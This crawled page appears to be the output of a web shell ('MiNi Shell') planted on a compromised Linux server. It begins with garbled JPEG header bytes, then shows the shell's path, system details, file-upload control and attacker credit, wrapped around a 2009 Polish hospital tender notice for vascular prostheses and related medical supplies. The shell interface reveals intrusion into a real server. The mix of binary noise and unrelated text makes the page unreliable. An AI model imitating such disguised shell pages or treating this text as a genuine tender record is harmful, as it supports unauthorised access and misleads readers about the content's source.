JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/163080-N-2009.html

<p class="kh_header"><b>Szczecin: Dostawa protez naczyniowych, portów naczyniowych, zestawów do jejunostomii oraz zgłębników Miller-Abbott dla SPSK Nr 2 PAM  w Szczecinie</b><br>
<b>Numer ogłoszenia: 163080 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 2 PAM w Szczecinie , Al. Powstańców Wielkopolskich 72, 70-111 Szczecin, woj. zachodniopomorskie, tel. 091 4661086, faks 091 4661113.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spsk2.pam.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa protez naczyniowych, portów naczyniowych, zestawów do jejunostomii oraz zgłębników Miller-Abbott dla SPSK Nr 2 PAM  w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE NR 1: PROTEZA NACZYNIOWA SZCZELNA ROZWIDLONA w ilości 50
ZADANIE NR 2: PROTEZA NACZYNIOWA ROZWIDLONA SZCZELNA IMPREGNOWANA FABRYCZNIE SUBSTANCJAMI UODPARNIAJĄCYMI NA ZAKAŻENIE w ilości 30 szt.
ZADANIE NR 3: PROTEZA NACZYNIOWA SZCZELNA PROSTA w ilości 80 szt.
ZADANIE NR 4: PROTEZA POLIESTROWA PROSTA w ilości 50 sztuk
ZADANIE NR 5: PROTEZA POLIESTROWA PROSTA w ilości 150 sztuk
ZADANIE NR 6: PROTEZA ZBROJONA w ilości 10 szt.
ZADANIE NR 7: PROTEZA ZBROJONA w ilości 10 szt.
ZADANIE NR 8: PROTEZA ZBROJONA w ilości 10 szt.
ZADANIE NR 9: PROTEZA ZBROJONA IMPREGNOWANA FABRYCZNIE SUBSTANCJAMI UODPORNIAJĄCYMI NA ZAKAŻENIA w ilości 15 szt.
ZADANIE NR 10: PROTEZA ZBROJONA IMPREGNOWANA FABRYCZNIE SUBSTANCJAMI UODPORNIAJĄCYMI NA ZAKAŻENIA w ilości 20 szt.
ZADANIE NR 11: ŁATA NACZYNIOWA w ilości 50 szt.
ZADANIE NR 12: SIATKA WZMACNIAJĄCA AUTOLOGICZNE PRZESZCZEPY NACZYŃ ŻYLNYCH
W ilości 15 szt + zestaw do implantacji siatki w ilości 1 szt.
ZADANIE NR 13: PORT NACZYNIOWY I IGŁY DO PORTU
W ilości 15 sztuk + Igła do portu w ilości 150 sztuk
ZADANIE NR 14: ZESTAW DO JEJUNOSTOMII w ilości 20 sztuk
ZADANIE NR 15: ZGŁĘBNIK MILLER-ABBOTT 16 CH w ilości 20 szt.
Szczegółowy opis przedmiotu zamówienia na poszczególnych zadaniach zawiera SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1.1	posiadają uprawnienia niezbędne do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
1.2	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W tym zakresie Zamawiający wymaga aby Wykonawca wykazał wykonanie/wykonywanie co najmniej 2 zamówień, których przedmiotem były dostawy wyrobów medycznych określonych w niniejszym postępowaniu, każde o wartości brutto nie mniejszej niż 1/3 wartości  brutto wynikającej ze złożonej oferty.
1.3	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca załączy do formularza oferty stanowiącego załącznik nr 1 do SIWZ następujące dokumenty:

1.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz spełnia warunki udziału w postępowaniu. Zamawiający żąda przedłożenia następujących dokumentów:

1.1.	Oświadczenia o spełnianiu warunków określonych w art. 22 PZP i nie podleganiu wykluczeniu z postępowania na podstawie art. 24 PZP. W tym celu wykonawcy mogą wykorzystać wzór oświadczenia stanowiący załącznik nr 2 do formularza oferty bądź załącznik nr 2a) do formularza oferty -w przypadku składania oferty przez  wykonawców wspólnie ubiegających się o udzielenie zamówienia .
1.2.	Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
2.1. Wykazu wykonanych/wykonywanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających rodzajem dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy te zostały wykonane należycie.  Wykonawcy do sporządzenia wykazu dostaw mogą wykorzystać formularz stanowiący załącznik nr 3 do formularza oferty. 
WAŻNE: Jeżeli Wykonawca na dowód należytego wykonania dostaw przedkłada referencje, to dokument ten powinien być podpisany przez dyrektora względnie zastępcę dyrektora,  a w spółkach prawa handlowego przez co najmniej jednego członka zarządu (bądź prokurenta). W przypadku przedłożenia referencji podpisanych przez inne osoby niż wyżej wymienione Zamawiający wymaga wykazania  przez Wykonawcę, że osoby które podpisały referencje  były do tego uprawnione.
3.	W celu potwierdzenia, że przedmiot zamówienia jest zgodny z wymaganiami Zamawiającego, Zamawiający żąda złożenia:
3.1. Dokumentów potwierdzających dopuszczenie do obrotu i używania na terytorium RP oferowanego sprzętu, zgodnie z Ustawą z dnia 20.04.2004 r o wyrobach medycznych (Dz.U nr 93, poz. 896), a mianowicie:
a)	Deklaracji zgodności;
b)	Certyfikatu wystawionego przez jednostkę notyfikowaną;
c)	Zgłoszenia wyrobu do Rejestru Wyrobów Medycznych 
         Dokumenty wymienione w ppkt 3.1 lit. b) i c) należy złożyć wówczas, gdy są wymagane zgodnie z przepisami art. 22, art. 52 i art. 54 ustawy z dnia 20.04.2004 r. o wyrobach medycznych. Na Deklaracji zgodności, Zgłoszeniu do Rejestru Wyrobów Medycznych i Certyfikacie zaleca się aby podać którego zadania dotyczy dokument.

3.2. Szczegółowy opis w języku polskim oferowanych wyrobów. Opis powinien zawierać pełny zakres informacji o oferowanym wyrobie, pozwalający zweryfikować wyroby oferowane przez Wykonawcę pod kątem zgodności z parametrami wymaganymi przez Zamawiającego. Wykonawcy mogą w tym celu wykorzystać formularz stanowiący załącznik nr 4 do druku oferty.

4.	Inne dokumenty
1)	Formularz cen jednostkowych wraz ze wskazaniem rodzaju dokumentu dopuszczającego oferowany wyrób do obrotu zgodnie z załącznikiem nr 1 do formularza oferty.
2)	Załącznik nr 5 -określający parametr podlegający ocenie w kryterium jakość dla zadań nr 1 i 3. W przypadku , gdy Wykonawca nie złoży ww. dokumentu oferta otrzyma 0 punktów za kryterium jakość..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spsk2.pam.szczecin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można zamówić faksem, listownie, odebrać osobiście w Dziale Zamówień Publicznych w budynku Działu Technicznego w pok. Nr 11 (cena 36,60 zł) oraz na www.spsk2.pam.szczecin.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 10:00, miejsce: siedziba zamawiającego pok. nr 13 budynek C (Dyrekcja).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kryteria wyboru ofert dla poszczególnych zadań są następujące:
Dla zadań 2, 4-15
1.   Cena brutto  -100%

 
Dla zadań 1 i 3

1.   Cena brutto  -90%
2.	Jakość - 10%.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1: PROTEZA NACZYNIOWA SZCZELNA ROZWIDLONA w ilości 50.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1: PROTEZA NACZYNIOWA SZCZELNA ROZWIDLONA w ilości 50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2: PROTEZA NACZYNIOWA ROZWIDLONA SZCZELNA IMPREGNOWANA FABRYCZNIE SUBSTANCJAMI UODPARNIAJĄCYMI NA ZAKAŻENIE w ilości 30 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2: PROTEZA NACZYNIOWA ROZWIDLONA SZCZELNA IMPREGNOWANA FABRYCZNIE SUBSTANCJAMI UODPARNIAJĄCYMI NA ZAKAŻENIE w ilości 30 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3: PROTEZA NACZYNIOWA SZCZELNA PROSTA w ilości 80 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3: PROTEZA NACZYNIOWA SZCZELNA PROSTA w ilości 80 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4: PROTEZA POLIESTROWA PROSTA w ilości 50 sztuk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4: PROTEZA POLIESTROWA PROSTA w ilości 50 sztuk.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR 5: PROTEZA POLIESTROWA PROSTA w ilości 150 sztuk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5: PROTEZA POLIESTROWA PROSTA w ilości 150 sztuk.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE NR 6: PROTEZA ZBROJONA w ilości 10 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 6: PROTEZA ZBROJONA w ilości 10 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE NR 7: PROTEZA ZBROJONA w ilości 10 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 7: PROTEZA ZBROJONA w ilości 10 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE NR 8: PROTEZA ZBROJONA w ilości 10 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 8: PROTEZA ZBROJONA w ilości 10 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZADANIE NR 9: PROTEZA ZBROJONA IMPREGNOWANA FABRYCZNIE SUBSTANCJAMI UODPORNIAJĄCYMI NA ZAKAŻENIA w ilości 15 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 9: PROTEZA ZBROJONA IMPREGNOWANA FABRYCZNIE SUBSTANCJAMI UODPORNIAJĄCYMI NA ZAKAŻENIA w ilości 15 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZADANIE NR 10: PROTEZA ZBROJONA IMPREGNOWANA FABRYCZNIE SUBSTANCJAMI UODPORNIAJĄCYMI NA ZAKAŻENIA w ilości 20 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 10: PROTEZA ZBROJONA IMPREGNOWANA FABRYCZNIE SUBSTANCJAMI UODPORNIAJĄCYMI NA ZAKAŻENIA w ilości 20 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIE NR 11: ŁATA NACZYNIOWA w ilości 50 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 11: ŁATA NACZYNIOWA w ilości 50 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> ZADANIE NR 12: SIATKA WZMACNIAJĄCA AUTOLOGICZNE PRZESZCZEPY NACZYŃ ŻYLNYCH
W ilości 15 szt + zestaw do implantacji siatki w ilości 1 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 12: SIATKA WZMACNIAJĄCA AUTOLOGICZNE PRZESZCZEPY NACZYŃ ŻYLNYCH
W ilości 15 szt + zestaw do implantacji siatki w ilości 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZADANIE NR 13: PORT NACZYNIOWY I IGŁY DO PORTU
W ilości 15 sztuk + Igła do portu w ilości 150 sztuk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 13: PORT NACZYNIOWY I IGŁY DO PORTU
W ilości 15 sztuk + Igła do portu w ilości 150 sztuk.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> ZADANIE NR 14: ZESTAW DO JEJUNOSTOMII w ilości 20 sztuk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 14: ZESTAW DO JEJUNOSTOMII w ilości 20 sztuk.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> ZADANIE NR 15: ZGŁĘBNIK MILLER-ABBOTT 16 CH w ilości 20 szt.
Szczegółowy opis przedmiotu zamówienia na poszczególnych zadaniach zawiera SIWZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 15: ZGŁĘBNIK MILLER-ABBOTT 16 CH w ilości 20 szt.
Szczegółowy opis przedmiotu zamówienia na poszczególnych zadaniach zawiera SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.42.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com